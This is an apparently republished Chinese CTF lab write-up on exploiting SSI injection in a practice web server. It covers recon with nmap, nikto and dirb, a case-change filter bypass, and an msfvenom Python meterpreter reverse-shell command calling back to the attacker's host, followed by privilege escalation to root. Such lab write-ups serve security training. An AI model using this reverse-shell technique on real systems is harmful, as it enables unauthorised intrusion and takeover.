ctf php sql注入,CTF—攻防练习之HTTP—SQL注入(SSI注入)
主機:192.168.32.152
靶機:192.168.32.161
ssI是賦予html靜態頁面的動態效果,通過ssi執行命令,返回對應的結果,若在網站目錄中發現了.stm .shtm .shtml等,且對應SSL輸入沒有過濾
該網站可能存在SSI注入漏洞
ssi注入就是尋找輸入點輸入類似 格式,看看能不能運行系統命令。
如??
切換目錄
nmap,nikto 分析,發現可能存在SSI注入,
dirb 看看目錄
index目錄下,有個SSi語句
SSI目錄下看到應該是和命令注入有關
通過robots.txt目錄挖掘到站點的根目錄
打開網頁找一個注入點,測試后,在這里找到,發現有過濾,大小寫可繞過,網頁給出的測試命名少了個!符號,加上測試成功
此時我們就可以嘗試生成一個python shell 上傳到網站服務器根目錄上,再執行反彈監聽
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444
在打開msfconsole監聽
此時再將生成的pyshell上傳至web根目錄(/var/www/html),再打開apache服務器
在開啟apache服務器,查看狀態
再將pyshell下載到站點上
再提權
然后啟動python pyshell.py,成功反彈shell!
隨后,進入shell,優化終端,可以進入root目錄
總結
以上是生活随笔為你收集整理的ctf php sql注入,CTF—攻防练习之HTTP—SQL注入(SSI注入)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: java分页的工具类,java分页工具类
- 下一篇: mac apache2 php,Mac